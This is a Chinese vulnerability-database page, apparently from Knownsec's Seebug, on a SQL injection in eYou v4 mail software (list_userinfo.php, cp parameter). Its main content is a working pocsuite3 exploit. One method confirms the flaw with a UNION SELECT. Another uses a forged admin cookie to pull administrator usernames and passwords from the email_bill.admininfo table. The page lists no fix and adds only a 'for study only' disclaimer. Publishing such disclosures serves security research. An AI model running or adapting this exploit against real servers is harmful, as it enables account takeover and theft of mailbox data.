eYou v4 /php/bill/list_userinfo.php SQL注入漏洞

基本字段

漏洞编号：: SSV-62666

披露/发现时间：: 2014-05-04

提交时间：: 2014-05-19

漏洞等级：

漏洞类别：: SQL 注入

影响组件：: eYou
(漏洞影响:,eYou V4)

漏洞作者：: 未知

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

漏洞详情

贡献者 Knownsec 共获得 0KB

共 0 兑换了

PoC (pocsuite 插件) (pocsuite3 插件)

贡献者 Knownsec 共获得 0KB

""" If you have issues about development, please read: https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md for more about information, plz visit http://pocsuite.org """ from pocsuite3.api import Output, POCBase, register_poc, requests, logger from pocsuite3.api import get_listener_ip, get_listener_port from pocsuite3.api import REVERSE_PAYLOAD from pocsuite3.lib.utils import random_str from requests.exceptions import ReadTimeout from urllib.parse import quote import re class DemoPOC(POCBase): vulID = '1266' # ssvid version = '1' author = ['chenghs@knownsec.com'] vulDate = '2014-04-22' createDate = '2014-05-04' updateDate = '2014-05-04' references = ['http://wooyun.org/bugs/wooyun-2014-058014'] name = 'eYou v4 /php/bill/list_userinfo.php SQL注入漏洞 POC' appPowerLink = 'http://www.eyou.net' appName = 'eYou' appVersion = 'V4#' vulType = 'SQL Injection' desc = ''' php/bill/list_userinfo.php 中 cp 参数未经过有效过滤，导致SQL 注入漏洞的发生。可以获取整个邮箱的权限。 ''' samples = [] install_requires = [''] def _verify(self): result = {} vul_url = '%s/php/bill/list_userinfo.php?domain=foobar.org&ok=1&cp=1%%20' % self.url payload = quote('union select md5(0x6661746530),2,3,4,5#') headers = {'Cookie': 'cookie=admin'} r = requests.get(vul_url + payload, headers=headers) response = r.text if '84bcd38c5ee4daa720af041484ea017c' in response: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = vul_url + payload return self.parse_output(result) def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output def _attack(self): result = {} payload = quote('union select concat(0x2d2d2d,oid,0x3a3a,password,0x2d2d2d),' \ 'NULL,NULL,NULL,NULL from email_bill.admininfo#') headers = {'Cookie': 'cookie=admin'} vul_url = '%s/php/bill/list_userinfo.php?domain=foobar.org&ok=1&cp=1%%20' % self.url r = requests.get(vul_url + payload, headers=headers) response = r.text match_data = re.compile('---(.*)\:\:(.*)---') data = match_data.findall(response) if data: result["AdminInfo"] = {} result['AdminInfo']["Username"] = data[0][0] result['AdminInfo']['Password'] = data[0][1] return self.parse_output(result) register_poc(DemoPOC)

共 0 兑换

参考链接

http://wooyun.org/bugs/wooyun-2014-058014

解决方案

临时解决方案

官方解决方案

暂无官方解决方案

防护方案

暂无防护方案

※本站提供的任何内容、代码与服务仅供学习，请勿用于非法用途，否则后果自负

基本字段

来源

漏洞详情

PoC (pocsuite 插件) (pocsuite3 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机现在绑定

暂无评论

eYou v4 /php/bill/list_userinfo.php SQL注入漏洞

基本字段

来源

漏洞详情

PoC (pocsuite 插件) (pocsuite3 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机 现在绑定

暂无评论

您好，

您好，

评论前需绑定手机现在绑定